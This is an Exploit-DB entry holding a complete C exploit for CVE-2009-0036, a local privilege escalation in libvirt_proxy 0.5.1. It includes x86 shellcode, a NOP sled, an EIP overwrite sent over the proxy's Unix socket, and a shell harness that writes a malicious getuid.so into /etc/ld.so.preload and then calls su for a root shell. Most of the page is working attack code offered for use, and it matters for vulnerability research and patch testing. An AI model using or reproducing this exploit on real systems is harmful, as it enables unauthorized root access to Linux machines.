libvirt_proxy 0.5.1 - Local Privilege Escalation

EDB-ID:

8534

CVE:

2009-0036

EDB Verified:

Author:

Jon Oberheide

Type:

local

Exploit:   /  

Platform:

Linux

Date:

2009-04-27

Vulnerable App: 
/*
 * cve-2009-0036.c
 *
 * libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0036
 *
 *   Buffer overflow in the proxyReadClientSocket function in 
 *   proxy/libvirt_proxy.c in libvirt_proxy 0.5.1 might allow local users to 
 *   gain privileges by sending a portion of the header of a virProxyPacket 
 *   packet, and then sending the remainder of the packet with crafted values 
 *   in the header, related to use of uninitialized memory in a validation 
 *   check.
 *   
 * Usage:
 *
 *   We're guessing to hit our NOP sled, so this program should be run in a 
 *   harness.  Since the shellcode will execute /tmp/run as root, the following
 *   harness will insert a malicious getuid.so payload in /etc/ld.so.preload.
 *
 *   #!/bin/sh
 *   
 *   echo "[+] compiling the exploit"
 *   gcc cve-2009-0036.c -o cve-2009-0036
 *   
 *   echo "[+] creating /tmp/getuid.so"
 *   echo "int getuid(){return 0;}" > /tmp/getuid.c
 *   gcc -shared /tmp/getuid.c -o /tmp/getuid.so
 *   
 *   echo "[+] setting up /tmp/run"
 *   echo -e "#!/bin/sh" > /tmp/run
 *   echo -e "touch /tmp/success" >> /tmp/run
 *   echo -e "echo \"/tmp/getuid.so\" > /etc/ld.so.preload" >> /tmp/run
 *   chmod +x /tmp/run
 *   
 *   echo "[+] starting exploit loop"
 *   i=0
 *   rm -f /tmp/success
 *   while [ ! -e "/tmp/success" ]
 *   do
 *           i=$(($i+1))
 *           echo "RUN NUMBER $i"
 *           ./cve-2009-0036
 *   done
 *   
 *   echo "[+] our getuid.so is now in ld.so.preload"
 *   echo "[+] running su to obtain root shell"
 *   su
 *
 * Notes:
 *
 *   Tested on Gentoo Linux 32-bit with GCC 4.3.3-r2 and randomize_va_space=1.
 *   We have a 4096 byte NOP sled before shellcode and EIP followed by 1000 
 *   NOP/30 byte shellcode bundles until we cause a EFAULT in libvirt_proxy's 
 *   read(2).  Our total sled is usually around 5k-10k NOPs so it'll take 
 *   ~800-1600 tries on average to hit it and execute our shellcode.  Each run
 *   takes ~1 second, so exploitation will probably take 10-20 minutes on
 *   average.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

#define PROXY_PATH "/usr/libexec/libvirt_proxy"
#define PROXY_SOCKET_PATH "/tmp/livirt_proxy_conn"
#define PROXY_PROTO_VERSION 1
#define PROXY_PACKET_LENGTH 0xffff

/* simple shellcode to execute /tmp/run */
const char shellcode[]= 
	"\x31\xdb"
	"\x8d\x43\x17"
	"\x99"
	"\xcd\x80"
	"\x31\xc9"
	"\x51"
	"\x68\x2f\x72\x75\x6e"
	"\x68\x2f\x74\x6d\x70"
	"\x8d\x41\x0b"
	"\x89\xe3"
	"\xcd\x80";

struct proxy_packet {
	uint16_t version;
	uint16_t command;
	uint16_t serial;
	uint16_t len;
};

int
main(int argc, char **argv)
{
	FILE *fp;
	long ptr;
	int i, fd, pid, ret;
        char *pkt, nop[65536];
	struct sockaddr_un addr;
	struct proxy_packet req;
	struct timeval tv;

	signal(SIGPIPE, SIG_IGN);

	/* guess a random offset to jmp to */
	gettimeofday(&tv, NULL);
	srand((tv.tv_sec ^ tv.tv_usec) ^ getpid());
	ptr = 0xbf000000 + (rand() & 0x00ffffff);

	/* fire up the setuid libvirt_proxy */
	pid = fork();
	if (pid == 0) {
		execl(PROXY_PATH, "libvirt_proxy", NULL);
	}

	memset(nop, '\x90', sizeof(nop));

	/* connect to libvirt_proxy's AF_UNIX socket */
	fd = socket(PF_UNIX, SOCK_STREAM, 0);
	if (fd < 0) {
		printf("[-] failed to create unix socket\n");
		return 1;
	}

	memset(&addr, 0, sizeof(addr));
	addr.sun_family = AF_UNIX;
	addr.sun_path[0] = '\0';
	strncpy(&addr.sun_path[1], PROXY_SOCKET_PATH, strlen(PROXY_SOCKET_PATH));

	printf("[+] connecting to libvirt_proxy\n");

	if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
		printf("[-] cant connect to libvirt_proxy socket\n");
		return 1;
	}

	/* transmit malicious payload to libvirt_proxy */
	pkt = (char *) &req;
	memset(&req, 0, sizeof(req));
	req.version = PROXY_PROTO_VERSION;
	req.len = PROXY_PACKET_LENGTH;

	printf("[+] sending initial packet header\n");
	send(fd, pkt, 7, 0);

	usleep(100000);

	printf("[+] sending corrupted length value\n");
	send(fd, pkt + 7, 1, 0);

	printf("[+] sending primary NOP sled\n");
	send(fd, nop, 4096, 0);

	printf("[+] sending primary shellcode\n");
	send(fd, shellcode, 28, 0);

	printf("[+] sending EIP overwrite (0x%lx)\n", ptr);
	send(fd, &ptr, 4, 0);

	usleep(100000);

	printf("[+] sending secondary NOP/shellcode bundles\n");
	for (i = 0; i < 100; ++i) {
		send(fd, nop, 1000, 0);
		send(fd, shellcode, 28, 0);
	}
	close(fd);

	usleep(800000);

	/* clean slate if our guessed addr failed */
	kill(pid, SIGKILL);

	return 0;
}

// milw0rm.com [2009-04-27]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services